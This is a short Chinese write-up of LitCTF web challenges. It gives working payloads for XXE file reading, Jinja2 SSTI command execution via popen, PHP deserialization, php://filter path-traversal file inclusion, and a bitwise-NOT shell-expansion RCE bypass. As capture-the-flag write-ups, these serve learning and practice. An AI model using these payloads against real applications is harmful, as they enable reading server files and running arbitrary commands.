Litctf-web

Litctf-web

exx

xxe,

html 复制代码
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个...池子

ssti,没有过滤

{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System

反序列化

php 复制代码
<?php

class User {

    public $username="admin";

    public $password="secure_password";

}
$a=new User();
echo base64_encode(serialize($a));

?>
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?

ssrf

file:///flag
高亮主题(划掉)背景查看器

文件包含伪协议

POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag

根目录下

百万美元的诱惑

rce

/下

?a[]=1&b[]=2&c=2025a

/dollar.php

取反绕过,自增应该也行试了下没过。

$(())为0

$_++也为1也可以应该

${_}=""输出上一次执行结果

( ( ((~ (( ((${_}))))=-1

%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
相关推荐
滴水之功7 分钟前
VMware OpenWrt怎么桥接模式联网
linux·openwrt
元争栈道14 分钟前
webview+H5来实现的android短视频(短剧)音视频播放依赖控件资源
android·音视频
乔峰不是张无忌33015 分钟前
【HTML】动态闪烁圣诞树+雪花+音效
前端·javascript·html·圣诞树
鸿蒙自习室22 分钟前
鸿蒙UI开发——组件滤镜效果
开发语言·前端·javascript
ldinvicible26 分钟前
How to run Flutter on an Embedded Device
linux
m0_7482507429 分钟前
高性能Web网关:OpenResty 基础讲解
前端·openresty
前端没钱1 小时前
从 Vue 迈向 React:平滑过渡与关键注意点全解析
前端·vue.js·react.js
NoneCoder1 小时前
CSS系列(29)-- Scroll Snap详解
前端·css
无言非影1 小时前
vtie项目中使用到了TailwindCSS,如何打包成一个单独的CSS文件(优化、压缩)
前端·css
居居飒1 小时前
Android学习(四)-Kotlin编程语言-for循环
android·学习·kotlin